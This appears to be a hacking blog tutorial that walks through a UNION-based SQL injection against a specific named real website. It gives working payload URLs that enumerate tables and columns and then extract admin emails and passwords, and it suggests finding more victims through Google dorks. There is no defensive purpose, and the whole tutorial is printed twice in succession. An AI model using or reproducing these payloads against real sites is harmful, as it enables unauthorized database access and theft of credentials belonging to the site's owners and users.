Today I Am Going to show you how to hack a website with sql injection So Lets Start
You Can Find Thousands For vulnerable websites using google dorks
Requirements:
Vulnerable Website
Firefox Browser
Hackbar (it is a firefox extension it should be installed in firefox browser)
==> I have vulnerable website
http://www.morephotosradio.com/transcript.php?interview_id=2021
To Check This website is vulnerable or not put ' sign in the end of link Like
==>http://www.morephotosradio.com/transcript.php?interview_id=2021'
The Page Will Show sqli error Like This
==> Find Number of tables by using order by --+ Query Like This
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+ No Error
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 7--+ No Error
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 15--+ No Error
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 30--+ No Error
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+ No Error
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+ Error
==> This Error shows that the website have 46 number of tables
==> Now Remove order by and go to UNION Based In Hackbar And Click On union+all+select -statement
==>A Small Box Will OPen In that box type the number of tables like of this website is 46
==> Also Place - Sign before parameter id like this (id=-2021)
==>Press Execuate Some Numbers will be shown on page Like You Can See In The Image Above Replace any one number by group_concat(table_name) and
write from information_schema.tables where table_schema=database()--+ in the end of url
For Finding Table Information
http://www.morephotosradio.com/transcript.php?interview_id=-2021 UNION SELECT
1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+information_schema.tables+where+table_schema=database()--+
==> The Page Will Show All Table Names We Want To Hack website so we need to find admin username and password
==> Now Remove database() From The query and go to sql basics then char() and then mysqlchar a small window will open
==>In That Window Type tables like admin user member i will type user because my admin table name is user
==>Click Ok Now Replace the following things of query
group_concat(table_name) to group_concat(column_name)
table_schema to table_name
information_schema.tables to information_schema.columns
the database() is already removed and mysql char of user is placed in the place of user
==> The Query For Columns Will Become Like This
http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+
Press Execuate
==> Now We Need Admin Email And Passwords
replace column_name with any column name you need like email amd password and in the end of url write from user like this
http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from user--+
Press Execuate
You Can See That We GOt All Emails And Passwords
You Can Find Thousands For vulnerable websites using google dorks
Requirements:
Vulnerable Website
Firefox Browser
Hackbar (it is a firefox extension it should be installed in firefox browser)
==> I have vulnerable website
http://www.morephotosradio.com/transcript.php?interview_id=2021
To Check This website is vulnerable or not put ' sign in the end of link Like
==>http://www.morephotosradio.com/transcript.php?interview_id=2021'
The Page Will Show sqli error Like This
==> Find Number of tables by using order by --+ Query Like This
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+ No Error
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 7--+ No Error
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 15--+ No Error
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 30--+ No Error
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+ No Error
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+ Error
==> This Error shows that the website have 46 number of tables
==> Now Remove order by and go to UNION Based In Hackbar And Click On union+all+select -statement
==>A Small Box Will OPen In that box type the number of tables like of this website is 46
==> Also Place - Sign before parameter id like this (id=-2021)
==>Press Execuate Some Numbers will be shown on page Like You Can See In The Image Above Replace any one number by group_concat(table_name) and
write from information_schema.tables where table_schema=database()--+ in the end of url
For Finding Table Information
http://www.morephotosradio.com/transcript.php?interview_id=-2021 UNION SELECT
1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+information_schema.tables+where+table_schema=database()--+
==> The Page Will Show All Table Names We Want To Hack website so we need to find admin username and password
==> Now Remove database() From The query and go to sql basics then char() and then mysqlchar a small window will open
==>In That Window Type tables like admin user member i will type user because my admin table name is user
==>Click Ok Now Replace the following things of query
group_concat(table_name) to group_concat(column_name)
table_schema to table_name
information_schema.tables to information_schema.columns
the database() is already removed and mysql char of user is placed in the place of user
==> The Query For Columns Will Become Like This
http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+
Press Execuate
==> Now We Need Admin Email And Passwords
replace column_name with any column name you need like email amd password and in the end of url write from user like this
http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from user--+
Press Execuate
You Can See That We GOt All Emails And Passwords
Comments
Post a Comment